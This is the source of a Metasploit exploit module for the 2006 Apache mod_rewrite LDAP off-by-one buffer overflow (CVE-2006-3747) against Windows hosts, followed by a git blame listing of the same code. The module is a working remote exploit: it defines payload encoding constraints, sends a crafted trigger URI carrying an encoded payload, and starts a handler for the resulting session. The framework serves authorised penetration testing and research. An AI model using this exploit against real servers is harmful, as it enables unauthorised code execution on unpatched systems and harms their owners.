modules/exploits/windows/http/apache_mod_rewrite_ldap.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',
      'Description'    => %q{
        This module exploits the mod_rewrite LDAP protocol scheme handling
        flaw discovered by Mark Dowd, which produces an off-by-one overflow.
        Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
        This module requires REWRITEPATH to be set accurately. In addition,
        the target must have 'RewriteEngine on' configured, with a specific
        'RewriteRule' condition enabled to allow for exploitation.

        The flaw affects multiple platforms, however this module currently
        only supports Windows based installations.
      },
      'Author'         => 'aushack',
      'References'     =>
        [
          [ 'CVE', '2006-3747' ],
          [ 'OSVDB', '27588' ],
          [ 'BID', '19204' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
          [ 'EDB', '3680' ],
          [ 'EDB', '3996' ],
          [ 'EDB', '2237' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Privileged'     => true,
      'Platform'       => ['win'],
      'Payload'        =>
        {
          'Space'    => 636,
          'BadChars' => "\x00\x0a\x0d\x20",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'StackAdjustment' => -3500,
          'DisableNops'  =>  'True',
        },
      'Targets'        =>
        [
          [  'Automatic', {} ], # aushack tested OK 20090310 win32
        ],
      'DisclosureDate' => 'Jul 28 2006',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
        ])
  end


  def check
    res = send_request_raw({
      'uri'     => '/',
      'version' => '1.1',
    }, 2)

    if (res.to_s =~ /Apache/) # This could be smarter.
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe

  end

  def exploit

    # On Linux Apache, it is possible to overwrite EIP by
    # sending ldap://<buf> ... TODO aushack

    trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

    print_status("Sending payload.")
    send_request_raw({
        'uri'     => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
        'version' => '1.0',
        }, 2)
    handler
  end
end
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = GreatRanking`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpClient`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
Fix caps that throw msftidy warnings 2013-09-24 13:03:16 -05:00			`'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',`
Retab modules 2013-08-30 16:28:54 -05:00			`'Description' => %q{`
			`This module exploits the mod_rewrite LDAP protocol scheme handling`
			`flaw discovered by Mark Dowd, which produces an off-by-one overflow.`
			`Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.`
			`This module requires REWRITEPATH to be set accurately. In addition,`
			`the target must have 'RewriteEngine on' configured, with a specific`
			`'RewriteRule' condition enabled to allow for exploitation.`
Various module cleanups 2010-02-15 00:48:03 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`The flaw affects multiple platforms, however this module currently`
			`only supports Windows based installations.`
			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => 'aushack',`
Retab modules 2013-08-30 16:28:54 -05:00			`'References' =>`
			`[`
			`[ 'CVE', '2006-3747' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '27588' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '19204' ],`
			`[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],`
			`[ 'EDB', '3680' ],`
			`[ 'EDB', '3996' ],`
			`[ 'EDB', '2237' ]`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumUpper 2015-02-08 18:29:25 -06:00			`'AllowWin32SEH' => true`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'Privileged' => true,`
Whoops on trailing commas 2013-09-24 15:14:11 -05:00			`'Platform' => ['win'],`
Retab modules 2013-08-30 16:28:54 -05:00			`'Payload' =>`
			`{`
			`'Space' => 636,`
			`'BadChars' => "\x00\x0a\x0d\x20",`
			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
			`'StackAdjustment' => -3500,`
			`'DisableNops' => 'True',`
			`},`
			`'Targets' =>`
			`[`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`[ 'Automatic', {} ], # aushack tested OK 20090310 win32`
Retab modules 2013-08-30 16:28:54 -05:00			`],`
			`'DisclosureDate' => 'Jul 28 2006',`
			`'DefaultTarget' => 0))`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options(`
			`[`
			`OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Various module cleanups 2010-02-15 00:48:03 +00:00
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def check`
			`res = send_request_raw({`
			`'uri' => '/',`
			`'version' => '1.1',`
			`}, 2)`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`if (res.to_s =~ /Apache/) # This could be smarter.`
			`return Exploit::CheckCode::Detected`
			`end`
			`return Exploit::CheckCode::Safe`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
Various module cleanups 2010-02-15 00:48:03 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# On Linux Apache, it is possible to overwrite EIP by`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`# sending ldap://<buf> ... TODO aushack`
Various module cleanups 2010-02-15 00:48:03 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'`
Added exploit module apache_mod_rewrite_ldap. 2009-03-10 06:42:11 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Sending payload.")`
			`send_request_raw({`
			`'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,`
			`'version' => '1.0',`
			`}, 2)`
			`handler`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`